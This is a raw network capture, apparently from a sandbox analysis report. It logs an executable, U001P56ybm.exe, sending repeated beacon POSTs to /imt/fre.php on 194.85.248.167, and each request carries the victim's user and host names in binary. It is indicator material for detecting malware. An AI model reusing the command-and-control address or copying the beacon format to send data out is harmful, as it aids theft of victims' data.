                  Date: Thu, 25 Nov 2021 17:23:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  38 | 192.168.2.3 | 49851 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:46.879978895 CET | 8072 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:46.908288956 CET | 8072 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:47.403832912 CET | 8077 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:46 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  39 | 192.168.2.3 | 49855 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:48.864530087 CET | 8081 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:48.892277002 CET | 8081 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:48.959682941 CET | 8081 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.3 | 49748 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:25.292669058 CET | 1086 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:25.557539940 CET | 1086 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:25.843662024 CET | 1086 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:25 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  40 | 192.168.2.3 | 49856 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:51.197910070 CET | 8082 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:51.225828886 CET | 8082 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:53.573219061 CET | 8083 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  41 | 192.168.2.3 | 49857 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:55.025971889 CET | 8083 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:55.053550005 CET | 8084 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:55.525480032 CET | 8084 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  42 | 192.168.2.3 | 49858 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:56.479058027 CET | 8085 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:56.507009983 CET | 8086 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:57.486293077 CET | 8086 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:56 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  43 | 192.168.2.3 | 49859 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:59.056904078 CET | 8087 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:59.085151911 CET | 8087 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:59.210263968 CET | 8088 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:59 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  44 | 192.168.2.3 | 49860 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:00.760570049 CET | 8088 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:00.788455963 CET | 8089 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:00.858030081 CET | 8089 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:00 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  45 | 192.168.2.3 | 49861 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:02.488225937 CET | 8090 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:02.517215967 CET | 8090 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:02.585421085 CET | 8090 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:02 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  46 | 192.168.2.3 | 49862 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:04.158303976 CET | 8091 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:04.185791016 CET | 8091 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:04.667956114 CET | 8091 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:04 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  47 | 192.168.2.3 | 49863 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:06.231426001 CET | 8092 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:06.259443998 CET | 8093 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:06.343086958 CET | 8094 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:06 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  48 | 192.168.2.3 | 49865 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:07.945362091 CET | 8100 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:07.980170012 CET | 8100 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:08.055053949 CET | 8101 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  49 | 192.168.2.3 | 49866 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:09.150415897 CET | 8102 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:09.178721905 CET | 8102 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:09.249567986 CET | 8102 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  5 | 192.168.2.3 | 49749 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:26.868772030 CET | 1087 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:26.902323961 CET | 1087 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:26.965337992 CET | 1088 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  50 | 192.168.2.3 | 49867 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:11.256726027 CET | 8103 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:11.284368038 CET | 8104 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:11.963359118 CET | 8104 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:11 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  6 | 192.168.2.3 | 49750 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:28.257549047 CET | 1088 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:28.287763119 CET | 1089 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:28.383367062 CET | 1089 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:28 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  7 | 192.168.2.3 | 49751 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:29.608133078 CET | 1090 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:29.636060953 CET | 1090 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:30.439112902 CET | 1090 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  8 | 192.168.2.3 | 49752 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:31.618849993 CET | 1091 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:31.647280931 CET | 1091 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:32.376492023 CET | 1092 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:31 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  9 | 192.168.2.3 | 49755 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:35.179306030 CET | 1115 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
